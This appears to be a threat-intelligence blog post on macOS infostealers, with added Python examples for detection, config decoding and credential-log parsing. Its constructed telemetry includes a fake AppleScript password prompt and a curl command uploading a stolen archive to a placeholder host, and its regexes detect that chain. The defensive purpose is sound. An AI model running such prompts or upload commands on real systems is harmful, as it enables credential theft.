The Rising Threat of macOS Infostealers: What You Need to Know to Defend Against Them
The macOS infostealer ecosystem is growing in popularity and sophistication. In this post, Flashpoint analysts dive into this rising threat and break down the common tactics, techniques, and procedures (TTPs) being observed in the wild.

Information-stealing malware has become one of the most pervasive and impactful threats facing organizations today, acting as a primary vector for ransomware and data breaches. While today’s sophisticated Windows-targeting stealers are the result of years of development, the macOS infostealer market is demonstrating its own rapid ascent into popularity.
In a recent Flashpoint webinar, Vice President of Intelligence Keisha Hoyt and Senior Hunt Analyst Paul Daubman unpacked this rising threat. They provided critical insights into the growing market share of macOS stealers, noting both prolific and newly emerging strains, and explored the common tactics, techniques, and procedures (TTPs) observed in the wild.
Here’s what you need to know.
macOS Infostealers: A Growing and Underestimated Threat
macOS environments are no longer flying under the radar—infostealers are increasingly targeting them with precision and purpose. These malicious tools are designed to harvest valuable information from infected devices, including host data, installed applications, and most critically, browser-stored data such as saved credentials, cookies, and autofill information. This stolen data often serves as the initial access point for threat actors, enabling further compromise or resale to initial access brokers and ransomware groups.
During the webinar, Flashpoint experts highlighted several prominent and fast-evolving macOS infostealers currently active in the wild:
- Atomic Stealer: Recognized as one of the most prevalent and dominant macOS infostealers, frequently updated and sold as Malware-as-a-Service (MaaS).
- Poseidon Stealer: A sophisticated strain that has remained active even after its source code was sold, with strong ties to Atomic Stealer’s development, as its alleged author is an ex-developer of Atomic.
- Cthulhu Stealer: Another significant MaaS offering in the macOS infostealer market, often seen alongside Atomic and Poseidon.
- Banshee: A separate project also contributing to the macOS infostealer landscape.
These stealers commonly use AppleScript (run through osascript) to display deceptive password prompts, run system_profiler to gather host and software details, compress the collected files into an archive, and exfiltrate that archive over HTTP. While they remain less mature than their Windows counterparts, their technical evolution is accelerating. The takeaway is clear: the macOS infostealer ecosystem is evolving quickly, and its growing prevalence signals an inevitable rise in sophistication. Organizations can no longer afford to treat macOS as a lower-tier security priority.
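The four behaviours above are what a detection should key on together rather than individually, because system_profiler on its own is routine. The following is an added example (not Flashpoint's tooling or code from the post) that correlates process events by their root ancestor and flags a parent whose children cover most of the chain. The event records are constructed to look like endpoint process telemetry; the specific curl and ditto command lines are assumptions about how the compression and HTTP upload might appear, since the post does not name the tools.

```python
"""Flag the macOS stealer execution chain described above: an AppleScript
password prompt, system_profiler recon, archiving the loot, HTTP upload.
Added example; EVENTS is constructed telemetry, not data from the post."""
import re
from collections import defaultdict

# Constructed sample telemetry: (pid, ppid, command line). Root 100 is the
# assumed malicious installer; root 200 is a benign interactive shell.
EVENTS = [
    (100, 1,   "/bin/bash /Volumes/Installer/Installer.command"),
    (101, 100, "osascript -e 'display dialog \"Required Application Helper. "
               "Please enter passphrase.\" with hidden answer default answer \"\"'"),
    (102, 100, "system_profiler SPHardwareDataType SPSoftwareDataType SPDisplaysDataType"),
    (103, 100, "ditto -c -k --sequesterRsrc /tmp/out /tmp/out.zip"),
    (104, 100, "curl -X POST -F file=@/tmp/out.zip http://192.0.2.10/contact"),
    (200, 1,   "/bin/zsh -l"),
    (201, 200, "system_profiler SPHardwareDataType"),
    (202, 200, "curl https://example.com/"),
]

# One regex per stage of the chain. Archive and exfil patterns anchor on the
# command name so a path like /tmp/out.zip does not count as "zip".
STAGES = [
    ("applescript_password_prompt",
     re.compile(r"osascript.*display dialog.*hidden answer", re.I)),
    ("system_profiler_recon", re.compile(r"\bsystem_profiler\b")),
    ("archive_collected_data", re.compile(r"^(?:\S*/)?(?:ditto|zip|tar)\b")),
    ("http_exfil",
     re.compile(r"^(?:\S*/)?curl\b.*(?:-X\s*POST|-F\s|--data|-d\s|--upload-file|-T\s)")),
]


def root_of(pid, parents):
    """Walk ppid links up to launchd (pid 1) or to a parent we never saw."""
    while True:
        ppid = parents.get(pid)
        if ppid is None or ppid == 1 or ppid not in parents:
            return pid
        pid = ppid


def detect(events, min_stages=3):
    """Return {root_pid: {stage_name: pid}} for roots covering >= min_stages.

    Requiring several stages under one ancestor keeps lone system_profiler
    or curl invocations from alerting."""
    parents = {pid: ppid for pid, ppid, _ in events}
    seen = defaultdict(dict)
    for pid, _, cmd in events:
        for name, rx in STAGES:
            if rx.search(cmd):
                seen[root_of(pid, parents)].setdefault(name, pid)
    return {root: stages for root, stages in seen.items()
            if len(stages) >= min_stages}


if __name__ == "__main__":
    for root, stages in detect(EVENTS).items():
        print(f"root pid {root}: {', '.join(f'{k}={v}' for k, v in stages.items())}")
```

With the constructed events, only root 100 is reported, with all four stages; the benign shell under root 200 runs system_profiler and curl but never reaches the threshold. In production the same correlation would run over EDR process-creation events, and the osascript pattern is the highest-signal stage because legitimate software rarely asks for a password through a hidden-answer dialog.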
Advanced Reverse Engineering and Automation Are Essential to Proactive Defense
Effective defense against infostealers requires more than detection; it demands deep understanding. Reverse engineering lets analysts deconstruct compiled malware into pseudocode, revealing how these tools operate, how they evade defenses, and how they evolve. By dissecting infostealer samples, security teams can uncover their inner workings and develop custom detections and automated extractors for key Indicators of Compromise (IOCs). These include command-and-control (C2) servers, universally unique identifiers (UUIDs), usernames, and build IDs, all vital for mapping attacker infrastructure and activity.
Flashpoint’s ability to reliably extract IOCs like C2 servers, universally unique identifiers (UUIDs), users, and build IDs from hundreds of stealer samples demonstrates the power of this automated approach in providing actionable threat intelligence. In the webinar, our intelligence team showcased this by detailing the analysis of Poseidon’s various forms, from simple hex-encoded and Base32-encoded variants to more complex versions employing custom Base64 alphabets and obfuscation techniques. Check out the on-demand video to see it in action.
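An extractor for the encodings listed above has to try each layer and accept only output that actually looks like a config. The following is an added example, not Flashpoint's extractor and not code from a Poseidon sample: the key=value config layout, the custom Base64 alphabet (the standard alphabet rotated by 13) and the encoded strings are all constructed for illustration. A real build's alphabet would be recovered from its decode routine during reverse engineering and dropped in for CUSTOM_B64.

```python
"""Decode hex, Base32 and custom-alphabet Base64 strings and pull IOCs
(C2, UUID, user, build ID) out of the result. Added example; the config
layout, alphabet and samples are constructed, not from a real stealer."""
import base64
import string

STD_B64 = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
# Constructed custom alphabet: standard alphabet rotated by 13 positions.
CUSTOM_B64 = STD_B64[13:] + STD_B64[:13]


def decode_hex(s):
    return bytes.fromhex(s)


def decode_base32(s):
    # Builders often strip '=' padding; restore it to a multiple of 8.
    return base64.b32decode(s + "=" * (-len(s) % 8))


def decode_custom_b64(s, alphabet=CUSTOM_B64):
    # Map the custom alphabet back onto the standard one, then decode.
    s = s.translate(str.maketrans(alphabet, STD_B64))
    return base64.b64decode(s + "=" * (-len(s) % 4), validate=True)


def encode_custom_b64(raw, alphabet=CUSTOM_B64):
    """Inverse of decode_custom_b64; used only to build a sample below."""
    s = base64.b64encode(raw).decode().rstrip("=")
    return s.translate(str.maketrans(STD_B64, alphabet))


DECODERS = [("hex", decode_hex), ("base32", decode_base32),
            ("custom_base64", decode_custom_b64)]


def parse_config(text):
    """Constructed layout 'key=value;key=value'. Return the IOC fields, or
    None when the text is not a config (the check that rejects a decoder
    that happened not to raise on the wrong input)."""
    fields = {}
    for item in text.split(";"):
        key, sep, value = item.partition("=")
        if not sep:
            return None
        fields[key] = value
    if not fields.get("c2", "").startswith("http"):
        return None
    return fields


def extract_iocs(blob):
    """Try each decoder in turn; accept the first output that parses."""
    for name, fn in DECODERS:
        try:
            text = fn(blob).decode("ascii")
        except ValueError:  # bad hex, bad padding, non-alphabet or non-ASCII
            continue
        cfg = parse_config(text)
        if cfg is not None:
            return name, cfg
    return None, None


UUID = "123e4567-e89b-12d3-a456-426614174000"  # constructed, not a real build
# Constructed samples: the hex string is hand-encoded from
# 'c2=http://192.0.2.10/;build=hx1'; the other two are built in code.
SAMPLES = [
    "63323d687474703a2f2f3139322e302e322e31302f3b6275696c643d687831",
    base64.b32encode(
        f"c2=http://192.0.2.10/p/;uuid={UUID};user=tester;build=b32".encode()
    ).decode().rstrip("="),
    encode_custom_b64(
        f"c2=http://192.0.2.10/p/;uuid={UUID};user=tester;build=cb64".encode()),
]

if __name__ == "__main__":
    for blob in SAMPLES:
        print(extract_iocs(blob))
```

Ordering the decoders from most to least restrictive (hex, then Base32, then Base64) matters: every hex string is also syntactically valid Base64, so trying Base64 first would produce binary garbage that a purely "did it raise" check would accept. The parse_config gate is what makes the extractor safe to run over hundreds of samples unattended.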
Flashpoint’s Log Parsing and Enrichment: Turning Raw Data into Real-Time Defense
To effectively defend against infostealers, organizations need more than alerts; they need comprehensive, timely, and actionable intelligence. Flashpoint’s log parsing and enrichment capabilities provide precisely this.
Flashpoint processes logs from over 30 active infostealer families, observing around 1.5 million unique infected hosts and capturing an average of 300 million total credential sets monthly, with approximately 50 million being unique credentials and 6 million never-before-seen.
This vast dataset forms the basis for identifying potential initial footholds into organizations. Flashpoint’s rigorous process of collecting, parsing, and distinguishing these logs—despite challenges like varying formats, rebrandings by resellers, and technical inconsistencies—is fundamental. This meticulous log parsing and enrichment transforms raw data into precise, actionable intelligence.
To maximize the impact of this intelligence, Flashpoint recommends a two-pronged approach for security teams:
- Pair enriched credential datasets with targeted domain monitoring to identify relevant exposures across criminal marketplaces.
- Proactively alert on compromised domains to detect and mitigate infostealer-driven risks before they escalate into breaches.
This method gives defenders a powerful edge, helping them detect initial access vectors early and respond with precision—before stolen data turns into lasting damage.
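The practical core of the two-pronged approach is normalising stealer logs that arrive in different layouts and matching the URL field against the domains an organization monitors. The following is an added example, not Flashpoint's parser: the two log layouts (a one-record-per-line URL:USER:PASS form and a key-per-line block form), the records, and the monitored domain list are constructed to illustrate the "varying formats" the post describes, not copied from any real stealer export.

```python
"""Parse credential records from two constructed stealer-log layouts and
match them against monitored domains. Added example; the layouts, records
and domain list are made up for illustration."""
from urllib.parse import urlsplit

# Constructed layout A: one record per line, URL:USER:PASS.
LOG_A = """\
https://mail.example.com/login:alice@example.com:Winter2024!
https://shop.example.net/account:bob:hunter2
android://abc123@com.example.app/:carol:p4ss
"""
# Constructed layout B: blank-line separated blocks, one field per line.
LOG_B = """\
SOFT: Chrome
URL: https://vpn.example.com/
USER: dave
PASS: letmein

SOFT: Firefox
URL: https://example.org/
USER: erin
PASS: s3cret
"""

MONITORED = {"example.com", "example.net"}  # constructed watch list


def parse_layout_a(text):
    """URL:USER:PASS lines. rsplit from the right keeps the scheme's '://'
    intact; a password containing ':' would still mis-split, which is the
    kind of inconsistency a production parser has to special-case."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        url, user, password = line.rsplit(":", 2)
        records.append({"url": url, "user": user, "password": password})
    return records


def parse_layout_b(text):
    """KEY: value blocks separated by blank lines."""
    records, current = [], {}
    for line in text.splitlines() + [""]:
        if not line.strip():
            if current:
                records.append({"url": current.get("URL", ""),
                                "user": current.get("USER", ""),
                                "password": current.get("PASS", "")})
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip().upper()] = value.strip()
    return records


def parse_logs():
    return parse_layout_a(LOG_A) + parse_layout_b(LOG_B)


def match_domain(host, monitored):
    """Exact or subdomain match; 'com.example.app' (an Android package
    name in the URL slot) must not match 'example.com'."""
    host = (host or "").lower().rstrip(".")
    for domain in monitored:
        if host == domain or host.endswith("." + domain):
            return domain
    return None


def find_exposures(records, monitored=MONITORED):
    """Return monitored-domain hits without the plaintext password."""
    hits = []
    for rec in records:
        host = urlsplit(rec["url"]).hostname
        domain = match_domain(host, monitored)
        if domain:
            hits.append({"url": rec["url"], "user": rec["user"],
                         "host": host, "domain": domain})
    return hits


if __name__ == "__main__":
    for hit in find_exposures(parse_logs()):
        print(f"{hit['domain']}: {hit['user']} @ {hit['url']}")
```

With the constructed input, three of the five records match (mail.example.com, shop.example.net and vpn.example.com); example.org and the Android package entry do not. The hits deliberately omit the password so the matching output can be routed to an alerting channel, with the full record kept behind access controls for the responder who resets the account.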
Mitigate Infostealer Risk with Flashpoint
Flashpoint empowers security teams with the intelligence and visibility required to proactively defend against infostealer threats before they evolve into full-scale incidents. By combining deep technical analysis with industry-leading primary-source collections and intelligence, Flashpoint enables organizations to:
- Understand which stealers are prolific and how they work
- Learn common infection chains to help identify exposures in real-time
- Prioritize remediation based on threat context and risk
- Disrupt adversary activity before it impacts operations
Throughout every stage of an infostealer attack, Flashpoint intelligence helps you stay ahead of attackers. To deepen your understanding of infostealers and the development of the macOS stealer landscape, watch the full on-demand webinar recording.